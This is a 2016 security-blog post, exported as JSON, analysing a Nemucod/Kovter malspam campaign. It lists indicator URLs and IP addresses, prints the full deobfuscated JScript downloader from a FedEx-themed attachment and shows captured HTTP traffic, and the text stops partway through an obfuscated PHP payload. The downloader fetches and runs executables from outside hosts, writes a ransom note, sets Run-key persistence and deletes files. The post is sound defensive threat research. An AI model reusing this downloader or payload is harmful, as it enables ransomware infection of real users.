{"id":571,"date":"2016-07-21T11:54:14","date_gmt":"2016-07-21T10:54:14","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=571"},"modified":"2016-07-21T11:54:14","modified_gmt":"2016-07-21T10:54:14","slug":"2016-07-20-another-nemucodkovter-malspam-example","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=571","title":{"rendered":"2016-07-20 Another Nemucod\/Kovter Malspam Example"},"content":{"rendered":"<p>Here is another example of Nemucod\/Kovter that I saw at work. It very much resembles another one that I saw and wrote up a while ago (see <a href=\"http:\/\/www.herbiez.com\/?p=535\" target=\"_blank\">http:\/\/www.herbiez.com\/?p=535<\/a>). For more information about how Nemucod\/Kovter keeps it&#8217;s persistence on the host system then please read this excellent blog post on MalwareBytes&#8217; blog <a href=\"http:\/\/blog.malwarebytes.com\/threat-analysis\/2016\/07\/untangling-kovter\/\" target=\"_blank\">here<\/a>. Since the MalwareByte&#8217;s blog covers the filesystem aspect incredibly well, I am not going to talk about it here since this one mimics what is seen in the blog post. Also, if you would like to see the artifacts found in this investigation, please see the Github repo <a href=\"http:\/\/github.com\/bloomer1016\/2016-07-20-Nemucod-Kovter-Malspam\" target=\"_blank\">here<\/a>. Below is my analysis of this one from some malspam.<\/p>\n<p>Indicators of Compromise: (based on URL Revealer and from the PCAP)<br \/>\n===================================================================<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nhttp:\/\/conbive.org\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=01\r\nhttp:\/\/empiricalstudyoflaw.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=11\r\nhttp:\/\/tricksstudy.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=21\r\nhttp:\/\/experiotech.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=31\r\nhttp:\/\/novinnamak.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=41\r\nhttp:\/\/conbive.org\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=02\r\nhttp:\/\/empiricalstudyoflaw.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=12\r\nhttp:\/\/tricksstudy.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=22\r\nhttp:\/\/experiotech.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=32\r\nhttp:\/\/novinnamak.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=42\r\nhttp:\/\/conbive.org\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=03\r\nhttp:\/\/empiricalstudyoflaw.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=13\r\nhttp:\/\/tricksstudy.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=23\r\nhttp:\/\/experiotech.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=33\r\nhttp:\/\/novinnamak.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=43\r\nhttp:\/\/conbive.org\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=04\r\nhttp:\/\/empiricalstudyoflaw.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=14\r\nhttp:\/\/tricksstudy.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=24\r\nhttp:\/\/experiotech.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=34\r\nhttp:\/\/novinnamak.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=44\r\nhttp:\/\/conbive.org\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=05\r\nhttp:\/\/empiricalstudyoflaw.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=15\r\nhttp:\/\/tricksstudy.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=25\r\nhttp:\/\/experiotech.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=35\r\nhttp:\/\/novinnamak.com\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&rnd=45\r\n155.254.148.45 \/ 80\r\n5.14.122.140 \/ 8080\r\n112.61.145.190 \/ 8080 \r\n5.91.37.133 \/ 8080 \r\n16.63.81.184 \/ 8080 \r\n139.163.70.63 \/ 8080 \r\n61.66.106.239 \/ 8080 \r\n43.102.191.80 \/ 8080 \r\n151.107.25.173 \/ 8080 \r\n76.181.148.151 \/ 8080 \r\n183.182.3.152 \/ 8080 \r\n33.101.35.120 \/ 8080 \r\n192.84.242.167 \/ 8080 \r\n138.67.209.103 \/ 8080 \r\n9.32.28.109 \/ 8080 \r\n50.31.10.82 \/ 8080 \r\n131.228.41.82 \/ 8080 \r\n94.129.18.183 \/ 8080 \r\n78.166.24.73 \/ 8080 \r\n147.14.246.62 \/ 8080 \r\n81.10.119.201 \/ 8080 \r\n118.27.184.191 \/ 8080 \r\n200.199.218.108 \/ 8080 \r\n193.161.82.58 \/ 8080 \r\n169.76.157.79 \/ 8080 \r\n73.65.34.145 \/ 8080 \r\n145.64.255.36 \/ 8080 \r\n147.47.111.54 \/ 8080<\/pre>\n<p>Below is the screen cap of the malicious email:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/07\/IMG1-1.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/07\/IMG1-1.png\" alt=\"\" width=\"677\" height=\"355\" class=\"aligncenter size-full wp-image-572\" \/><\/a><\/p>\n<p>Information about the malspam:<br \/>\n==============================<br \/>\nAs stated above, the email that was sent had a zip file that once unzipped had a javascript file in it. The javascript has the following details:<\/p>\n<p>File name: FedEx_00000763083.doc.js<br \/>\nSize: 55.7KB<br \/>\nSHA256: d2a58bfce71df20f230bd4ee63d691a65760da490a59e92f351f300c37e05535<br \/>\nVT link: NA<br \/>\nHybrid Analysis: NA<br \/>\nMalwr: NA<\/p>\n<p>The javascript file is obfuscated and makes no sense, but using Revelo and the option of &#8220;send eval to action&#8221; I was able to de-obfuscate the code:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\"> \r\n var id=&quot;a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&quot;;\r\n var ad=&quot;19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&quot;;\r\n var bc=&quot;0.43946&quot;;\r\n var ld=0;\r\n var cq=String.fromCharCode(34);\r\n var cs=String.fromCharCode(92);\r\n var ll=&#x5B;&quot;conbive.org&quot;,&quot;empiricalstudyoflaw.com&quot;,&quot;tricksstudy.com&quot;,&quot;experiotech.com&quot;,&quot;novinnamak.com&quot;];\r\n var ws=WScript.CreateObject(&quot;WScript.Shell&quot;);\r\n var fn=ws.ExpandEnvironmentStrings(&quot;%TEMP%&quot;)+cs+&quot;a&quot;;\r\n var pd=ws.ExpandEnvironmentStrings(&quot;%TEMP%&quot;)+cs+&quot;php4ts.dll&quot;;\r\n var xo=WScript.CreateObject(&quot;Msxml2.XMLHTTP&quot;);\r\n var xa=WScript.CreateObject(&quot;ADODB.Stream&quot;);\r\n var fo=WScript.CreateObject(&quot;Scripting.FileSystemObject&quot;);\r\n if (!fo.FileExists(fn+&quot;.txt&quot;))\r\n {\r\n   for(var n=1;\r\n   n&lt;=5;\r\n   n++)\r\n   {\r\n     for(var i=ld;\r\n     i&lt;ll.length;\r\n     i++)\r\n     {\r\n       var dn=0;\r\n       try\r\n       {\r\n         xo.open(&quot;GET&quot;,&quot;http:\/\/&quot;+ll&#x5B;i]+&quot;\/counter\/?ad=&quot;+ad+&quot;&amp;id=&quot;+id+&quot;&amp;rnd=&quot;+i+n, false);\r\n         xo.send();\r\n         if(xo.status==200)\r\n         {\r\n           xa.open();\r\n           xa.type=1;\r\n           xa.write(xo.responseBody);\r\n           if(xa.size&gt;1000)\r\n           {\r\n             dn=1;\r\n             if(n&lt;=2)\r\n             {\r\n               xa.saveToFile(fn+n+&quot;.exe&quot;,2);\r\n               try\r\n               {\r\n                 ws.Run(fn+n+&quot;.exe&quot;,1,0);\r\n               }\r\n               catch(er)\r\n               {\r\n                 \r\n               }\r\n               ;\r\n             }\r\n             else if(n==3)\r\n             {\r\n               xa.saveToFile(fn+&quot;.exe&quot;,2);\r\n             }\r\n             else if(n==4)\r\n             {\r\n               xa.saveToFile(pd,2);\r\n             }\r\n             else if(n==5)\r\n             {\r\n               xa.saveToFile(fn+&quot;.php&quot;,2);\r\n             }\r\n             \r\n           }\r\n           ; xa.close();\r\n           \r\n         }\r\n         ; if(dn==1)\r\n         {\r\n           ld=i;\r\n           break;\r\n         }\r\n         ;\r\n       }\r\n       catch(er)\r\n       {\r\n         \r\n       }\r\n       ;\r\n     }\r\n     ;\r\n   }\r\n   ; if(fo.FileExists(fn+&quot;.exe&quot;) &amp;&amp; fo.FileExists(pd) &amp;&amp; fo.FileExists(fn+&quot;.php&quot;))\r\n   {\r\n     var fp=fo.CreateTextFile(fn+&quot;.txt&quot;,true);\r\n     fp.WriteLine(&quot;ATTENTION!&quot;);\r\n     fp.WriteLine(&quot;&quot;);\r\n     fp.WriteLine(&quot;All your documents, photos, databases and other important personal files&quot;);\r\n     fp.WriteLine(&quot;were encrypted using strong RSA-1024 algorithm with a unique key.&quot;);\r\n     fp.WriteLine(&quot;To restore your files you have to pay &quot;+bc+&quot; BTC (bitcoins).&quot;);\r\n     fp.WriteLine(&quot;Please follow this manual:&quot;);\r\n     fp.WriteLine(&quot;&quot;);\r\n     fp.WriteLine(&quot;1. Create Bitcoin wallet here:&quot;);\r\n     fp.WriteLine(&quot;&quot;);\r\n     fp.WriteLine(&quot;      http:\/\/blockchain.info\/wallet\/new&quot;);\r\n     fp.WriteLine(&quot;&quot;);\r\n     fp.WriteLine(&quot;2. Buy &quot;+bc+&quot; BTC with cash, using search here:&quot;);\r\n     fp.WriteLine(&quot;&quot;);\r\n     fp.WriteLine(&quot;      http:\/\/localbitcoins.com\/buy_bitcoins&quot;);\r\n     fp.WriteLine(&quot;&quot;);\r\n     fp.WriteLine(&quot;3. Send &quot;+bc+&quot; BTC to this Bitcoin address:&quot;);\r\n     fp.WriteLine(&quot;&quot;);\r\n     fp.WriteLine(&quot;      &quot;+ad);\r\n     fp.WriteLine(&quot;&quot;);\r\n     fp.WriteLine(&quot;4. Open one of the following links in your browser to download decryptor:&quot;);\r\n     fp.WriteLine(&quot;&quot;);\r\n     for (var i=0;\r\n     i&lt;ll.length;\r\n     i++)\r\n     {\r\n       fp.WriteLine(&quot;      http:\/\/&quot;+ll&#x5B;i]+&quot;\/counter\/?a=&quot;+ad);\r\n       \r\n     }\r\n     ; fp.WriteLine(&quot;&quot;);\r\n     fp.WriteLine(&quot;5. Run decryptor to restore your files.&quot;);\r\n     fp.WriteLine(&quot;&quot;);\r\n     fp.WriteLine(&quot;PLEASE REMEMBER:&quot;);\r\n     fp.WriteLine(&quot;&quot;);\r\n     fp.WriteLine(&quot;      - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.&quot;);\r\n     fp.WriteLine(&quot;      - Nobody can help you except us.&quot;);\r\n     fp.WriteLine(&quot;      - It`s useless to reinstall Windows, update antivirus software, etc.&quot;);\r\n     fp.WriteLine(&quot;      - Your files can be decrypted only after you make payment.&quot;);\r\n     fp.WriteLine(&quot;      - You can find this manual on your desktop (DECRYPT.txt).&quot;);\r\n     fp.Close();\r\n     ws.Run(&quot;%COMSPEC% \/c REG ADD &quot;+cq+&quot;HKCU&quot;+cs+&quot;SOFTWARE&quot;+cs+&quot;Microsoft&quot;+cs+&quot;Windows&quot;+cs+&quot;CurrentVersion&quot;+cs+&quot;Run&quot;+cq+&quot; \/V &quot;+cq+&quot;Crypted&quot;+cq+&quot; \/t REG_SZ \/F \/D &quot;+cq+fn+&quot;.txt&quot;+cq,0,0);\r\n     ws.Run(&quot;%COMSPEC% \/c REG ADD &quot;+cq+&quot;HKCR&quot;+cs+&quot;.crypted&quot;+cq+&quot; \/ve \/t REG_SZ \/F \/D &quot;+cq+&quot;Crypted&quot;+cq,0,0);\r\n     ws.Run(&quot;%COMSPEC% \/c REG ADD &quot;+cq+&quot;HKCR&quot;+cs+&quot;Crypted&quot;+cs+&quot;shell&quot;+cs+&quot;open&quot;+cs+&quot;command&quot;+cq+&quot; \/ve \/t REG_SZ \/F \/D &quot;+cq+&quot;notepad.exe &quot;+cs+cq+fn+&quot;.txt&quot;+cs+cq+cq,0,0);\r\n     ws.Run(&quot;%COMSPEC% \/c copy \/y &quot;+cq+fn+&quot;.txt&quot;+cq+&quot; &quot;+cq+&quot;%AppData%&quot;+cs+&quot;Desktop&quot;+cs+&quot;DECRYPT.txt&quot;+cq,0,0);\r\n     ws.Run(&quot;%COMSPEC% \/c copy \/y &quot;+cq+fn+&quot;.txt&quot;+cq+&quot; &quot;+cq+&quot;%UserProfile%&quot;+cs+&quot;Desktop&quot;+cs+&quot;DECRYPT.txt&quot;+cq,0,0);\r\n     ws.Run(&quot;%COMSPEC% \/c &quot;+fn+&quot;.exe &quot;+cq+fn+&quot;.php&quot;+cq,0,1);\r\n     ws.Run(&quot;%COMSPEC% \/c notepad.exe &quot;+cq+fn+&quot;.txt&quot;+cq,0,0);\r\n     var fp=fo.CreateTextFile(fn+&quot;.php&quot;,true);\r\n     for(var i=0;\r\n     i&lt;1000;\r\n     i++)\r\n     {\r\n       fp.WriteLine(ad);\r\n     }\r\n     ;fp.Close();\r\n     ws.Run(&quot;%COMSPEC% \/c DEL &quot;+cq+fn+&quot;.php&quot;+cq,0,0);\r\n     ws.Run(&quot;%COMSPEC% \/c DEL &quot;+cq+fn+&quot;.exe&quot;+cq,0,0);\r\n     ws.Run(&quot;%COMSPEC% \/c DEL &quot;+cq+pd+cq,0,0);\r\n     \r\n   }\r\n   ;\r\n }\r\n ;<\/pre>\n<p>Investigation of the malspam<br \/>\n============================<br \/>\nFrom the network perspective, even though there are 5 different domains listed in the above code the only one that is used is the domain of &#8216;conbive.org&#8217; with the URI string of &#8216;\/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&amp;id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&amp;rnd=&#8217;. The interesting one that gets downloaded is the last one (05) as that looks to be obfuscated PHP code (as seen below &#8211; filename=8fe422ece.png). Also notice that all the files requested are for PNG files, but really are binary\/PHP script files instead.<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET \/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&amp;id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&amp;rnd=01 HTTP\/1.1\r\nAccept: *\/*\r\nUA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/6.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: conbive.org\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Wed, 20 Jul 2016 09:27:19 GMT\r\nServer: Apache Phusion_Passenger\/4.0.10 mod_bwlimited\/1.4 mod_fcgid\/2.3.9\r\nX-Powered-By: PHP\/5.4.45\r\nContent-Disposition: attachment; filename=762df.png\r\nContent-Length: 317269\r\nContent-Type: image\/png\r\nX-Pad: avoid browser bug\r\n\r\nMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.\r\n\r\n-----\r\n\r\nGET \/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&amp;id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&amp;rnd=02 HTTP\/1.1\r\nAccept: *\/*\r\nUA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/6.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: conbive.org\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Wed, 20 Jul 2016 09:27:25 GMT\r\nServer: Apache Phusion_Passenger\/4.0.10 mod_bwlimited\/1.4 mod_fcgid\/2.3.9\r\nX-Powered-By: PHP\/5.4.45\r\nContent-Disposition: attachment; filename=9ee89b53cd.png\r\nContent-Length: 127094\r\nContent-Type: image\/png\r\n\r\nMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.\r\n\r\n-----\r\n\r\nGET \/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&amp;id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&amp;rnd=03 HTTP\/1.1\r\nAccept: *\/*\r\nUA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/6.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: conbive.org\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Wed, 20 Jul 2016 09:27:27 GMT\r\nServer: Apache Phusion_Passenger\/4.0.10 mod_bwlimited\/1.4 mod_fcgid\/2.3.9\r\nX-Powered-By: PHP\/5.4.45\r\nContent-Disposition: attachment; filename=f.png\r\nContent-Length: 45056\r\nContent-Type: image\/png\r\n\r\nMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.\r\n\r\n-----\r\n\r\nGET \/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&amp;id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&amp;rnd=04 HTTP\/1.1\r\nAccept: *\/*\r\nUA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/6.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: conbive.org\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Wed, 20 Jul 2016 09:27:28 GMT\r\nServer: Apache Phusion_Passenger\/4.0.10 mod_bwlimited\/1.4 mod_fcgid\/2.3.9\r\nX-Powered-By: PHP\/5.4.45\r\nContent-Disposition: attachment; filename=689f943bdf9f68b4.png\r\nContent-Length: 1417216\r\nContent-Type: image\/png\r\n\r\nMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.\r\n\r\n-----\r\n\r\nGET \/counter\/?ad=19eBRNV8sxUWGjeQZYU3t7UGWrXK11LFqg&amp;id=a5EDyaa6RhRlNZwZDV_Eow41e2XnyjdUQ8jGkSthiSqorYyqqUJYRGgw6mtGWq17TRFIsH8zjUF2jZOAI1dYXhc92ckiGi7Tpfg_tw&amp;rnd=05 HTTP\/1.1\r\nAccept: *\/*\r\nUA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/6.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: conbive.org\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Wed, 20 Jul 2016 09:27:43 GMT\r\nServer: Apache Phusion_Passenger\/4.0.10 mod_bwlimited\/1.4 mod_fcgid\/2.3.9\r\nX-Powered-By: PHP\/5.4.45\r\nContent-Disposition: attachment; filename=8fe422ece.png\r\nContent-Length: 7283\r\nContent-Type: image\/png\r\n\r\n&lt;?php $t104=&quot;pre&quot;.chr(103).&quot;_r&quot;.chr(101).&quot;place&quot;;$m173=&quot;e&quot;.chr(118).&quot;al(bas&quot;.chr(101).&quot;64_decode(&quot;.chr(34).&quot;c2V0X3RpbWV&quot;.chr(102).&quot;bGlt&quot;.chr(97).&quot;XQoMCk7DQoNCm&quot;.chr(90).&quot;v&quot;.chr(99).&quot;igk&quot;.chr(97).&quot;T02N&quot;.chr(122).&quot;s&quot;.chr(107).chr(97).&quot;Tw&quot;.chr(57).&quot;OTA&quot;.chr(55).chr(74).chr(71).chr(107).&quot;rKyk&quot;.chr(103).&quot;aWYoQG&quot;.chr(108).&quot;zX2Rpcihj&quot;.chr(97).&quot;HIoJGk&quot;.chr(112).&quot;Lic6J&quot;.chr(121).&quot;k&quot;.chr(112).&quot;IFRy&quot;.chr(90).&quot;W&quot;.chr(85).&quot;o&quot;.chr(89).chr(50).&quot;h&quot;.chr(121).&quot;KCR&quot;.chr(112).&quot;K&quot;.chr(83).&quot;4&quot;.chr(110).&quot;Oic&quot;.chr(112).&quot;Ow0&quot;.chr(75).&quot;DQpmd&quot;.chr(87).&quot;5jdGlvbiBUcmV&quot;.chr(108).&quot;KCRwKQ0&quot;.chr(75).&quot;ew0KC&quot;.chr(83).chr(82).&quot;hPSdl&quot;.chr(74).&quot;zs&quot;.chr(78).&quot;Cgkk&quot;.chr(97).&quot;z&quot;.chr(49).&quot;iYXNlNjRfZGV&quot;.chr(106).&quot;b2&quot;.chr(82).&quot;lKCdN&quot;.chr(86).&quot;0t&quot;.chr(85).&quot;Y&quot;.chr(51).&quot;F2a&quot;.chr(48).&quot;w1&quot;.chr(86).&quot;DVDRXFN&quot;.chr(98).&quot;XV3Kz&quot;.chr(70).chr(68).chr(83).chr(110).&quot;dXckFHd&quot;.chr(49).chr(66).&quot;nd0&quot;.chr(77).&quot;z&quot;.chr(78).&quot;3hzQ&quot;.chr(50).&quot;lnc&quot;.chr(67).chr(57).&quot;4UkZHd&quot;.chr(107).chr(78).chr(116).&quot;K0lwe&quot;.chr(107).&quot;RhZzYxQzFFR0&quot;.chr(100).&quot;5K&quot;.chr(50).&quot;x&quot;.chr(84).&quot;dVF&quot;.chr(119).&quot;djBUN&quot;.chr(108).&quot;Q1L&quot;.chr(48).chr(77).&quot;5aWhQaHN&quot;.chr(49).&quot;dkVvby9&quot;.chr(111).chr(84).&quot;nFP&quot;.chr(79).&quot;DJmOV&quot;.chr(108).&quot;0bEF&quot;.chr(97).&quot;NF&quot;.chr(78).&quot;LRDR&quot;.chr(79).chr(83).&quot;C9L&quot;.chr(97).&quot;mI3dnZ1&quot;.chr(79).&quot;GdOS&quot;.chr(85).&quot;RN&quot;.chr(100).&quot;0FaT&quot;.chr(87).chr(116).&quot;RSnpy&quot;.chr(97).chr(70).chr(89).&quot;4Jyk7&quot;.chr(68).chr(81).&quot;o&quot;.chr(74).&quot;JHM9Y2hyK&qu